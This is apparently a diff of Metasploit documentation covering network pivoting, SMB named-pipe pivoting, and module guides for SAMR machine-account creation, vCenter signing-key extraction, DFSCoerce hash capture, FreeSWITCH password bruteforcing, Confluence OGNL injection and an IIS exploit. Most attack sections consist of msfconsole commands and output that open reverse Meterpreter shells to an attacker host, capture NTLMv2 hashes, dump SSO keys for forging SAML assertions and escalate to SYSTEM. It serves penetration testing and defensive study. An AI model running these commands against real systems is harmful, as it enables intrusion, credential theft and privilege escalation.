||||
"targets": null,
|
||||
"mod_time": "2022-05-17 09:28:07 +0000",
|
||||
"mod_time": "2022-05-27 16:41:25 +0000",
|
||||
"path": "/modules/payloads/adapters/cmd/windows/powershell/x64.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "cmd/windows/powershell/x64/vncinject/reverse_winhttps",
|
||||
@@ -204132,7 +204356,7 @@
|
||||
"autofilter_ports": null,
|
||||
"autofilter_services": null,
|
||||
"targets": null,
|
||||
"mod_time": "2022-01-14 16:55:43 +0000",
|
||||
"mod_time": "2022-06-23 18:43:18 +0000",
|
||||
"path": "/modules/post/windows/escalate/getsystem.rb",
|
||||
"is_install_path": true,
|
||||
"ref_name": "windows/escalate/getsystem",
|
||||
@@ -204140,6 +204364,14 @@
|
||||
"post_auth": false,
|
||||
"default_credential": false,
|
||||
"notes": {
|
||||
"AKA": [
|
||||
"Named Pipe Impersonation",
|
||||
"Token Duplication",
|
||||
"RPCSS",
|
||||
"PrintSpooler",
|
||||
"EFSRPC",
|
||||
"EfsPotato"
|
||||
]
|
||||
},
|
||||
"session_types": [
|
||||
"meterpreter"
|
||||
|
||||
@@ -1,4 +1,5 @@
|
||||
# Overview of Pivoting And Its Benefits
|
||||
## Overview
|
||||
|
||||
Whilst in test environments one is often looking at flat networks that only have one subnet and one network environment, the reality is that when it comes to pentests that are attempting to compromise an entire company, you will often have to deal with multiple networks, often with switches or firewalls in-between that are intended to keep these networks separate from one another.
|
||||
|
||||
In order for pivoting to work, you must have compromised a host that is connected to two or more networks. This usually means that the host has two or more network adapters, whether that be physical network adapters, virtual network adapters, or a combination of both.
|
||||
@@ -7,11 +8,14 @@ Once you have compromised a host that has multiple network adapters you can then
|
||||
|
||||
Now that we understand some of the background, lets see this in action a bit more by setting up a sample environment and walking through some of Metasploit's pivoting features.
|
||||
|
||||
# A Quick Note Before Continuing
|
||||
## Supported Session Types
|
||||
|
||||
Pivoting functionality is provided by all Meterpreter and SSH sessions that occur over TCP channels. Whilst Meterpreter is mentioned below, keep in mind that this would also work with an SSH session as well. We have just resorted to using Meterpreter for this example for demonstration purposes.
|
||||
|
||||
# Testing Pivoting
|
||||
## Target Environment Setup
|
||||
## Testing Pivoting
|
||||
|
||||
### Target Environment Setup
|
||||
|
||||
- Kali Machine
|
||||
- Internal: None
|
||||
- External: 172.19.182.171
|
||||
@@ -153,7 +157,7 @@ IPv4 Active Routing Table
|
||||
msf6 post(multi/manage/autoroute) >
|
||||
```
|
||||
|
||||
# Using the Pivot
|
||||
## Using the Pivot
|
||||
At this point we can now use the pivot with any Metasploit modules as shown below:
|
||||
|
||||
```
|
||||
@@ -210,11 +214,80 @@ msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce)
|
||||
[*] 169.254.204.110:443 - The target is not exploitable. Exchange Server 15.2.986.14 does not appear to be a vulnerable version!
|
||||
msf6 exploit(windows/http/exchange_chainedserializationbinder_denylist_typo_rce) >
|
||||
```
|
||||
# Pivoting External Tools
|
||||
## portfwd
|
||||
|
||||
## SMB Named Pipe Pivoting in Meterpreter
|
||||
|
||||
The Windows Meterpreter payload supports lateral movement in a network through SMB Named Pipe Pivoting. No other Meterpreters/session types support this functionality.
|
||||
|
||||
First open a Windows Meterpreter session to the pivot machine:
|
||||
|
||||
```
|
||||
msf6 > use payload/windows/x64/meterpreter/reverse_tcp
|
||||
smsf6 payload(windows/x64/meterpreter/reverse_tcp) > set lhost 172.19.182.171
|
||||
lhost => 172.19.182.171
|
||||
msf6 payload(windows/x64/meterpreter/reverse_tcp) > set lport 4578
|
||||
lport => 4578
|
||||
msf6 payload(windows/x64/meterpreter/reverse_tcp) > to_handler
|
||||
[*] Payload Handler Started as Job 0
|
||||
|
||||
[*] Started reverse TCP handler on 172.19.182.171:4578
|
||||
msf6 payload(windows/x64/meterpreter/reverse_tcp) > [*] Sending stage (200774 bytes) to 172.19.185.34
|
||||
[*] Meterpreter session 1 opened (172.19.182.171:4578 -> 172.19.185.34:49674) at 2022-06-09 13:23:03 -0500
|
||||
```
|
||||
|
||||
Create named pipe pivot listener on the pivot machine, setting `-l` to the pivot's bind address:
|
||||
|
||||
```
|
||||
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
|
||||
[*] Starting interaction with 1...
|
||||
|
||||
meterpreter > pivot add -t pipe -l 169.254.16.221 -n msf-pipe -a x64 -p windows
|
||||
[+] Successfully created pipe pivot.
|
||||
meterpreter > background
|
||||
[*] Backgrounding session 1...
|
||||
```
|
||||
|
||||
Now generate a separate payload that will connect back through the pivot machine. This payload will be executed on the final target machine. Note there is no need to start a handler for the named pipe payload.
|
||||
|
||||
```
|
||||
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > show options
|
||||
|
||||
Module options (payload/windows/x64/meterpreter/reverse_named_pipe):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
|
||||
PIPEHOST . yes Host of the pipe to connect to
|
||||
PIPENAME msf-pipe yes Name of the pipe to listen on
|
||||
|
||||
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > set pipehost 169.254.16.221
|
||||
pipehost => 169.254.16.221
|
||||
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > generate -f exe -o revpipe_meterpreter_msfpipe.exe
|
||||
[*] Writing 7168 bytes to revpipe_meterpreter_msfpipe.exe...
|
||||
```
|
||||
|
||||
After running the payload on the final target machine a new session will open, via the Windows 11 169.254.16.221 pivot.
|
||||
```
|
||||
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > [*] Meterpreter session 2 opened (Pivot via [172.19.182.171:4578 -> 169.254.16.221:49674]) at 2022-06-09 13:34:32 -0500
|
||||
|
||||
msf6 payload(windows/x64/meterpreter/reverse_named_pipe) > sessions
|
||||
|
||||
Active sessions
|
||||
===============
|
||||
|
||||
Id Name Type Information Connection
|
||||
-- ---- ---- ----------- ----------
|
||||
1 meterpreter x64/windows WIN11\msfuser @ WIN11 172.19.182.171:4578 -> 172.19.185.34:49674 (172.19.185.34)
|
||||
2 meterpreter x64/windows WIN2019\msfuser @ WIN2019 Pivot via [172.19.182.171:4578 -> 172.19.185.34:49674]
|
||||
(169.254.204.110)
|
||||
|
||||
```
|
||||
## Pivoting External Tools
|
||||
|
||||
### portfwd
|
||||
*Note: This method is discouraged as you can only set up a mapping between a single port and another target host and port, so using the socks module below is encouraged where possible. Additionally this method has been depreciated for some time now.*
|
||||
|
||||
### Local Port Forwarding
|
||||
#### Local Port Forwarding
|
||||
To set up a port forward using Metasploit, use the `portfwd` command within a supported session's console such as the Meterpreter console. Using `portfwd -h` will bring up a help menu similar to the following:
|
||||
|
||||
```
|
||||
@@ -262,7 +335,7 @@ Connecting to 127.0.0.1:443... failed: Connection refused.
|
||||
|
||||
Note that you may need to edit your `/etc/hosts` file to map IP addresses to given host names to allow things like redirects to redirect to the right hostname or IP address when using this method of pivoting.
|
||||
|
||||
### Listing Port Forwards and Removing Entries
|
||||
#### Listing Port Forwards and Removing Entries
|
||||
Can list port forwards using the `portfwd list` command. To delete all port forwards use `portfwd flush`. Alternatively to selectively delete local port forwarding entries, use `portfwd delete -l <local port>`.
|
||||
|
||||
```
|
||||
@@ -275,7 +348,7 @@ No port forwards are currently active.
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Remote Port Forwarding
|
||||
#### Remote Port Forwarding
|
||||
This scenario is a bit different than above. Whereas previously we were instructing the session to forward traffic from our host running Metasploit, through the session, and to a second target host, with reverse port forwarding the scenario is a bit different. In this case we are instructing the session to forward traffic from other hosts through the session, and to our host running Metasploit. This is useful for allowing other applications running within a target network to interact with local applications on the machine running Metasploit.
|
||||
|
||||
To set up a reverse port forward, use `portfwd add -R` within a supported session and then specify the `-l`, `-L` and `-p` options. The `-l` option specifies the port to forward the traffic to, the `-L` option specifies the IP address to forward the traffic to, and the `-p` option specifies the port to listen on for traffic on the machine that we have a session on (whose session console we are currently interacting with).
|
||||
|
||||
@@ -0,0 +1,100 @@
|
||||
## Vulnerable Application
|
||||
Add, lookup and delete computer accounts via MS-SAMR. By default standard active directory users can add up to 10 new
|
||||
computers to the domain. Administrative privileges however are required to delete the created accounts.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. From msfconsole
|
||||
2. Do: `use auxiliary/admin/dcerpc/samr_computer`
|
||||
3. Set the `RHOSTS`, `SMBUser` and `SMBPass` options
|
||||
1. Set the `COMPUTER_NAME` option for `DELETE_COMPUTER` and `LOOKUP_COMPUTER` actions
|
||||
4. Run the module and see that a new machine account was added
|
||||
|
||||
## Options
|
||||
|
||||
### SMBDomain
|
||||
|
||||
The Windows domain to use for authentication. The domain will automatically be identified if this option is left in its
|
||||
default value.
|
||||
|
||||
### COMPUTER_NAME
|
||||
|
||||
The computer name to add, lookup or delete. This option is optional for the `ADD_COMPUTER` action, and required for the
|
||||
`LOOKUP_COMPUTER` and `DELETE_COMPUTER` actions.
|
||||
|
||||
### COMPUTER_PASSWORD
|
||||
|
||||
The password for the new computer. This option is only used for the `ADD_COMPUTER` action. If left blank, a random value
|
||||
will be generated.
|
||||
|
||||
## Actions
|
||||
|
||||
### ADD_COMPUTER
|
||||
|
||||
Add a new computer to the domain. This action will fail with status `STATUS_DS_MACHINE_ACCOUNT_QUOTA_EXCEEDED` if the
|
||||
user has exceeded the maximum number of computer accounts that they are allowed to create.
|
||||
|
||||
After the computer account is created, the password will be set for it. If `COMPUTER_NAME` is set, that value will be
|
||||
used and the module will fail if the selected name is already in use. If `COMPUTER_NAME` is *not* set, a random value
|
||||
will be used.
|
||||
|
||||
### DELETE_COMPUTER
|
||||
|
||||
Delete a computer from the domain. This action requires that the `COMPUTER_NAME` option be set.
|
||||
|
||||
### LOOKUP_COMPUTER
|
||||
|
||||
Lookup a computer in the domain. This action verifies that the specified computer exists, and looks up its security ID
|
||||
(SID), which includes the relative ID (RID) as the last component.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows Server 2019
|
||||
|
||||
First, a new computer account is created and its details are logged to the database.
|
||||
|
||||
```
|
||||
msf6 auxiliary(admin/dcerpc/samr_computer) > set RHOSTS 192.168.159.96
|
||||
RHOSTS => 192.168.159.96
|
||||
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBUser aliddle
|
||||
SMBUser => aliddle
|
||||
msf6 auxiliary(admin/dcerpc/samr_computer) > set SMBPass Password1
|
||||
SMBPass => Password1
|
||||
msf6 auxiliary(admin/dcerpc/samr_computer) > show options
|
||||
|
||||
Module options (auxiliary/admin/dcerpc/samr_computer):
|
||||
|
||||
Name Current Setting Required Description
|
||||
---- --------------- -------- -----------
|
||||
COMPUTER_NAME no The computer name
|
||||
COMPUTER_PASSWORD no The password for the new computer
|
||||
RHOSTS 192.168.159.96 yes The target host(s), see https://github.com/rapid7/metasploit-framework/wiki/Using-Metasploit
|
||||
RPORT 445 yes The target port (TCP)
|
||||
SMBDomain . no The Windows domain to use for authentication
|
||||
SMBPass Password1 no The password for the specified username
|
||||
SMBUser aliddle no The username to authenticate as
|
||||
|
||||
|
||||
Auxiliary action:
|
||||
|
||||
Name Description
|
||||
---- -----------
|
||||
ADD_COMPUTER Add a computer account
|
||||
|
||||
|
||||
msf6 auxiliary(admin/dcerpc/samr_computer) > run
|
||||
[*] Running module against 192.168.159.96
|
||||
|
||||
[*] 192.168.159.96:445 - Using automatically identified domain: MSFLAB
|
||||
[+] 192.168.159.96:445 - Successfully created MSFLAB\DESKTOP-2X8F54QG$ with password MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(admin/dcerpc/samr_computer) > creds
|
||||
Credentials
|
||||
===========
|
||||
|
||||
host origin service public private realm private_type JtR Format
|
||||
---- ------ ------- ------ ------- ----- ------------ ----------
|
||||
192.168.159.96 192.168.159.96 445/tcp (smb) DESKTOP-2X8F54QG$ MCoDkNALd3SdGR1GoLhqniEkWa8Me9FY MSFLAB Password
|
||||
|
||||
msf6 auxiliary(admin/dcerpc/samr_computer) >
|
||||
```
|
||||
@@ -0,0 +1,98 @@
|
||||
Grab certificates from the vCenter server vmdird or vmafd database files and adds them to loot.
|
||||
This module will accept files from a live vCenter appliance or from a vCenter appliance backup
|
||||
archive; either or both files can be supplied to the module depending on the situation. The module
|
||||
will extract the vCenter SSO IdP signing credential from the vmdir database, which can be used to
|
||||
create forged SAML assertions and access the SSO directory as an administrator. The vmafd service
|
||||
contains the vCenter certificate store which from which the module will attempt to extract all vmafd
|
||||
certificates that also have a corresponding private key. Portions of this module are based on
|
||||
information published by Zach Hanley at Horizon3:
|
||||
|
||||
https://www.horizon3.ai/compromising-vcenter-via-saml-certificates/
|
||||
|
||||
## Vulnerable Application
|
||||
This module is tested against the vCenter appliance but will probably work against Windows instances.
|
||||
It has been tested against files from vCenter appliance versions 6.5, 6.7, and 7.0. The module will
|
||||
work with files retrieved from a live vCenter system as well as files extracted from an unencrypted
|
||||
vCenter backup archive.
|
||||
|
||||
## Verification Steps
|
||||
You must possess the vmdir and/or vmafd database files from vCenter in order to use this module. The
|
||||
files must be local to the system invoking the module. Where possible, you should provide the
|
||||
`VC_IP` option to tag relevant loot entries with the IPv4 address of the originating system. If no
|
||||
value is provided for `VC_IP` the module defaults to assigning the loopback IP `127.0.0.1`.
|
||||
|
||||
1. Acquire the vmdir and/or vmafd database files from vCenter (see below)
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/admin/vmware/vcenter_offline_mdb_extract`
|
||||
4. Do: `set vmdir_mdb <path to data.mdb>` if you are extracting from the vmdir database
|
||||
5. Do: `set vmafd_db <path to afd.db>` if you are extracting from the vmafd database
|
||||
6. Do: `set vc_ip <vCenter IPv4>` to attach the target vCenter IPv4 address to loot entries
|
||||
7. Do: `dump`
|
||||
|
||||
## Options
|
||||
**VMDIR_MDB**
|
||||
|
||||
Path to the vmdird MDB database file on the local system. Example: `/tmp/data.mdb`
|
||||
|
||||
**VMAFD_DB**
|
||||
|
||||
Path to the vmafd DB file on the local system. Example: `/tmp/afd.db`
|
||||
|
||||
**VC_IP**
|
||||
|
||||
Optional parameter to set the IPv4 address associated with loot entries made by the module.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Acquire Database Files
|
||||
This module targets the internal databases of vCenter vmdir (OpenLDAP Memory-Mapped Database) and
|
||||
vmafd (SQLite3). On a live vCenter appliance, these files can be downloaded with root access from
|
||||
the following locations:
|
||||
|
||||
`vmdir: /storage/db/vmware-vmdir/data.mdb`
|
||||
`vmafd: /storage/db/vmware-vmafd/afd.db`
|
||||
|
||||
If you are extracting from a backup file, target files are available in the following archives:
|
||||
|
||||
`vmdir: lotus_backup.tar.gz`
|
||||
`vmafd: config_files.tar.gz`
|
||||
|
||||
### Running the Module
|
||||
Example run against database files extracted from vCenter appliance version 7.0 Update 3d:
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/admin/vmware/vcenter_offline_mdb_extract
|
||||
msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmdir_mdb /tmp/data.mdb
|
||||
vmdir_mdb => /tmp/data.mdb
|
||||
msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vmafd_db /tmp/afd.db
|
||||
vmafd_db => /tmp/afd.db
|
||||
msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > set vc_ip 192.168.100.70
|
||||
vc_ip => 192.168.100.70
|
||||
msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) > dump
|
||||
|
||||
[*] Extracting vmwSTSTenantCredential from /tmp/data.mdb ...
|
||||
[+] SSO_STS_IDP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_571080.key
|
||||
[+] SSO_STS_IDP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_idp_564729.pem
|
||||
[+] VMCA_ROOT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_vmca_721819.pem
|
||||
[*] Extracting vSphere platform certificates from /tmp/afd.db ...
|
||||
[+] __MACHINE_CERT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_869237.key
|
||||
[+] __MACHINE_CERT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70___MACHINE_CERT_240839.pem
|
||||
[+] DATA-ENCIPHERMENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_350586.key
|
||||
[+] DATA-ENCIPHERMENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_DATAENCIPHERMEN_106169.pem
|
||||
[+] HVC key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_825963.key
|
||||
[+] HVC cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_HVC_399928.pem
|
||||
[+] MACHINE key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_995574.key
|
||||
[+] MACHINE cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_MACHINE_156797.pem
|
||||
[+] SMS_SELF_SIGNED key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_169524.key
|
||||
[+] SMS_SELF_SIGNED cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_SMS_SELF_SIGNED_230704.pem
|
||||
[+] VPXD key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_370336.key
|
||||
[+] VPXD cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXD_300599.pem
|
||||
[+] VPXD-EXTENSION key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_571196.key
|
||||
[+] VPXD-EXTENSION cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VPXDEXTENSION_088742.pem
|
||||
[+] VSPHERE-WEBCLIENT key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_060718.key
|
||||
[+] VSPHERE-WEBCLIENT cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_VSPHEREWEBCLIEN_280013.pem
|
||||
[+] WCP key: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_057402.key
|
||||
[+] WCP cert: /home/cs137/.msf4/loot/20220512133836_default_192.168.100.70_WCP_909204.pem
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(admin/vmware/vcenter_offline_mdb_extract) >
|
||||
```
|
||||
@@ -0,0 +1,62 @@
|
||||
## Vulnerable Application
|
||||
|
||||
Coerce an authentication attempt over SMB to other machines via MS-DFSNM methods.
|
||||
|
||||
## Verification Steps
|
||||
Example steps in this format (is also in the PR):
|
||||
|
||||
1. Install the application
|
||||
2. Start msfconsole
|
||||
3. Do: `use auxiliary/scanner/dcerpc/dfscoerce`
|
||||
4. Set the `RHOSTS` and `LISTENER` options
|
||||
5. Set the `SMBUser`, `SMBPass` for authentication
|
||||
6. (Optional) Set the `METHOD` options to adjust the trigger vector
|
||||
7. Do: `run`
|
||||
|
||||
## Options
|
||||
|
||||
### LISTENER
|
||||
The host listening for the incoming connection. The target will authenticate to this host using SMB. The listener host
|
||||
should be hosting some kind of capture or relaying service.
|
||||
|
||||
### METHOD
|
||||
The RPC method to use for triggering.
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows Server 2019
|
||||
In this case, Metasploit is hosting an SMB capture server to log the incoming credentials from the target machine
|
||||
account. The target is a 64-bit Windows Server 2019 domain controller.
|
||||
|
||||
```
|
||||
msf6 > use auxiliary/server/capture/smb
|
||||
msf6 auxiliary(server/capture/smb) > run
|
||||
[*] Auxiliary module running as background job 0.
|
||||
msf6 auxiliary(server/capture/smb) >
|
||||
[*] Server is running. Listening on 0.0.0.0:445
|
||||
[*] Server started.
|
||||
|
||||
msf6 auxiliary(server/capture/smb) > use auxiliary/scanner/dcerpc/dfscoerce
|
||||
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set RHOSTS 192.168.159.96
|
||||
RHOSTS => 192.168.159.96
|
||||
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set VERBOSE true
|
||||
VERBOSE => true
|
||||
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBUser aliddle
|
||||
SMBUser => aliddle
|
||||
msf6 auxiliary(scanner/dcerpc/dfscoerce) > set SMBPass Password1
|
||||
SMBPass => Password1
|
||||
msf6 auxiliary(scanner/dcerpc/dfscoerce) > run
|
||||
|
||||
[*] 192.168.159.96:445 - Connecting to Distributed File System (DFS) Namespace Management Protocol
|
||||
[*] 192.168.159.96:445 - Binding to \netdfs...
|
||||
[+] 192.168.159.96:445 - Bound to \netdfs
|
||||
[+] Received SMB connection on Auth Capture Server!
|
||||
[SMB] NTLMv2-SSP Client : 192.168.250.237
|
||||
[SMB] NTLMv2-SSP Username : MSFLAB\WIN-3MSP8K2LCGC$
|
||||
[SMB] NTLMv2-SSP Hash : WIN-3MSP8K2LCGC$::MSFLAB:971293df35be0d1c:804d2d329912e92a442698d0c6c94f08:01010000000000000088afa3c78cd801bc3c7ed684c95125000000000200120057004f0052004b00470052004f00550050000100120057004f0052004b00470052004f00550050000400120057004f0052004b00470052004f00550050000300120057004f0052004b00470052004f0055005000070008000088afa3c78cd80106000400020000000800300030000000000000000000000000400000f0ba0ee40cb1f6efed7ad8606610712042fbfffb837f66d85a2dfc3aa03019b00a001000000000000000000000000000000000000900280063006900660073002f003100390032002e003100360038002e003200350030002e003100330034000000000000000000
|
||||
|
||||
[+] 192.168.159.96:445 - Server responded with ERROR_ACCESS_DENIED which indicates that the attack was successful
|
||||
[*] 192.168.159.96:445 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
msf6 auxiliary(scanner/dcerpc/dfscoerce) >
|
||||
```
|
||||
@@ -0,0 +1,65 @@
|
||||
## Vulnerable Application
|
||||
[FreeSWITCH](https://freeswitch.com/) is a free and open-source software defined telecommunications stack for real-time communication,
|
||||
WebRTC, telecommunications, video, and Voice over Internet Protocol.
|
||||
|
||||
The [Event Socket](https://freeswitch.org/confluence/display/FREESWITCH/mod_event_socket) `mod_event_socket` is a TCP based interface to
|
||||
control FreeSWITCH and is enabled by default.
|
||||
|
||||
This module has been tested successfully on FreeSWITCH versions:
|
||||
* 1.10.7-release-19-883d2cb662~64bit on Debian 10.11 (buster)
|
||||
|
||||
### Description
|
||||
|
||||
This module is a login utility to find the password of the FreeSWITCH event socket service by bruteforcing the login interface.
|
||||
Note that this service does not require a username to log in; login is done purely via supplying a valid password.
|
||||
This module will stops as soon as a valid password is found.
|
||||
|
||||
This service is enabled by default and listens on TCP port 8021 on the local network interface.
|
||||
|
||||
Source and Installers:
|
||||
* [Source Code Repository](https://github.com/signalwire/freeswitch)
|
||||
* [Installers](https://freeswitch.org/confluence/display/FREESWITCH/Installation)
|
||||
* [Virtual Machine](https://freeswitch.com/index.php/fs-virtual-machine/)
|
||||
* [Docker](https://github.com/drachtio/docker-drachtio-freeswitch-mrf)
|
||||
|
||||
Docker installation:
|
||||
```
|
||||
docker pull drachtio/drachtio-freeswitch-mrf
|
||||
docker run -d --rm --name FS1 --net=host \
|
||||
-v /home/deploy/log:/usr/local/freeswitch/log \
|
||||
-v /home/deploy/sounds:/usr/local/freeswitch/sounds \
|
||||
-v /home/deploy/recordings:/usr/local/freeswitch/recordings \
|
||||
drachtio/drachtio-freeswitch-mrf freeswitch --sip-port 5038 --tls-port 5039 --rtp-range-start 20000 --rtp-range-end 21000 --password hunter
|
||||
```
|
||||
|
||||
## Verification Steps
|
||||
1. Do: `use auxiliary/scanner/misc/freeswitch_event_socket_login`
|
||||
2. Do: `set RHOSTS [ips]`
|
||||
3. Do: `set PASS_FILE /home/kali/passwords.txt`
|
||||
4. Do: `run`
|
||||
|
||||
## Options
|
||||
### PASS_FILE
|
||||
The file containing a list of passwords to try logging in with.
|
||||
|
||||
## Scenarios
|
||||
### FreeSWITCH 1.10.7 Linux Debian 10.11 (Docker Image)
|
||||
```
|
||||
msf6 > use auxiliary/scanner/misc/freeswitch_event_socket_login
|
||||
msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set RHOSTS 192.168.56.1
|
||||
RHOSTS => 192.168.56.1
|
||||
msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > set PASS_FILE /home/kali/passwords.txt
|
||||
PASS_FILE => /home/kali/passwords.txt
|
||||
msf6 auxiliary(scanner/misc/freeswitch_event_socket_login) > run
|
||||
|
||||
[!] 192.168.56.1:8021 - No active DB -- Credential data will not be saved!
|
||||
[-] 192.168.56.1:8021 - 192.168.56.1:8021 - LOGIN FAILED: ClueCon (Incorrect: -ERR invalid)
|
||||
[-] 192.168.56.1:8021 - 192.168.56.1:8021 - LOGIN FAILED: admin (Incorrect: -ERR invalid)
|
||||
[-] 192.168.56.1:8021 - 192.168.56.1:8021 - LOGIN FAILED: 123456 (Incorrect: -ERR invalid)
|
||||
[-] 192.168.56.1:8021 - 192.168.56.1:8021 - LOGIN FAILED: 12345 (Incorrect: -ERR invalid)
|
||||
[-] 192.168.56.1:8021 - 192.168.56.1:8021 - LOGIN FAILED: 123456789 (Incorrect: -ERR invalid)
|
||||
[-] 192.168.56.1:8021 - 192.168.56.1:8021 - LOGIN FAILED: password (Incorrect: -ERR invalid)
|
||||
[+] 192.168.56.1:8021 - 192.168.56.1:8021 - Login Successful: hunter (Successful: +OK accepted)
|
||||
[*] 192.168.56.1:8021 - Scanned 1 of 1 hosts (100% complete)
|
||||
[*] Auxiliary module execution completed
|
||||
```
|
||||
+37
@@ -87,4 +87,41 @@ Meterpreter : python/linux
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
### Confluence 7.17.2 on Windows Server 2019
|
||||
|
||||
```
|
||||
msf6 > use exploit/multi/http/atlassian_confluence_namespace_ognl_injection
|
||||
[*] No payload configured, defaulting to cmd/unix/python/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set RHOSTS 192.168.159.10
|
||||
RHOSTS => 192.168.159.10
|
||||
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set TARGET Windows\ Command
|
||||
TARGET => Windows Command
|
||||
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set PAYLOAD cmd/windows/powershell/x64/meterpreter/reverse_tcp
|
||||
PAYLOAD => cmd/windows/powershell/x64/meterpreter/reverse_tcp
|
||||
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > set LHOST 192.168.159.128
|
||||
LHOST => 192.168.159.128
|
||||
msf6 exploit(multi/http/atlassian_confluence_namespace_ognl_injection) > exploit
|
||||
|
||||
[*] Started reverse TCP handler on 192.168.159.128:4444
|
||||
[*] Running automatic check ("set AutoCheck false" to disable)
|
||||
[+] The target is vulnerable. Successfully tested OGNL injection.
|
||||
[*] Executing cmd/windows/powershell/x64/meterpreter/reverse_tcp (Windows Command)
|
||||
[*] Sending stage (200774 bytes) to 192.168.159.10
|
||||
[*] Meterpreter session 1 opened (192.168.159.128:4444 -> 192.168.159.10:49943) at 2022-06-15 17:22:07 -0400
|
||||
|
||||
meterpreter > sysinfo
|
||||
Computer : WIN-3MSP8K2LCGC
|
||||
OS : Windows 2016+ (10.0 Build 17763).
|
||||
Architecture : x64
|
||||
System Language : en_US
|
||||
Domain : MSFLAB
|
||||
Logged On Users : 9
|
||||
Meterpreter : x64/windows
|
||||
meterpreter > getuid
|
||||
Server username: NT AUTHORITY\NETWORK SERVICE
|
||||
meterpreter > getsystem
|
||||
...got system via technique 4 (Named Pipe Impersonation (RPCSS variant)).
|
||||
meterpreter >
|
||||
```
|
||||
|
||||
[1]: https://jira.atlassian.com/browse/CONFSERVER-79000?src=confmacro
|
||||
|
||||
@@ -18,6 +18,17 @@ exploitation can take a few minutes.
|
||||
6. Verify the module yields a PHP meterpreter session in < 5 minutes
|
||||
7. Verify the malicious PHP file was automatically removed
|
||||
|
||||
## Options
|
||||
|
||||
### WAIT_TIMEOUT
|
||||
Seconds to wait to trigger the payload
|
||||
### NameField
|
||||
Name of the element for the Name field
|
||||
### EmailField
|
||||
Name of the element for the Email field
|
||||
### MessageField
|
||||
Name of the element for the Message field
|
||||
|
||||
## Scenarios
|
||||
|
||||
Demo taken directly from [PR7768](https://github.com/rapid7/metasploit-framework/pull/7768)
|
||||
|
||||
@@ -0,0 +1,71 @@
|
||||
## Vulnerable Application
|
||||
|
||||
This module will execute an arbitrary payload on a Microsoft IIS installation
|
||||
that is vulnerable to the CGI double-decode vulnerability of 2001.
|
||||
|
||||
This module has been tested successfully on:
|
||||
|
||||
* Windows 2000 Professional (SP0) (EN)
|
||||
* Windows 2000 Professional (SP1) (AR)
|
||||
* Windows 2000 Professional (SP1) (CZ)
|
||||
* Windows 2000 Server (SP0) (FR)
|
||||
* Windows 2000 Server (SP1) (EN)
|
||||
* Windows 2000 Server (SP1) (SE)
|
||||
|
||||
Note: This module will leave a Metasploit payload in the IIS scripts directory.
|
||||
|
||||
## Verification Steps
|
||||
|
||||
1. `use exploit/windows/iis/ms01_026_dbldecode`
|
||||
1. `set RHOSTS [IP]`
|
||||
1. `set PAYLOAD windows/shell/reverse_tcp`
|
||||
1. `set LHOST [IP]`
|
||||
1. `run`
|
||||
|
||||
## Options
|
||||
|
||||
### WINDIR
|
||||
|
||||
The Windows directory name of the target host.
|
||||
The directory name will be detected automatically if not set.
|
||||
|
||||
### DEPTH
|
||||
|
||||
Traversal depth to reach the drive root (default: `2`)
|
||||
|
||||
## Scenarios
|
||||
|
||||
### Windows 2000 Server (SP0) (FR)
|
||||
|
||||
```
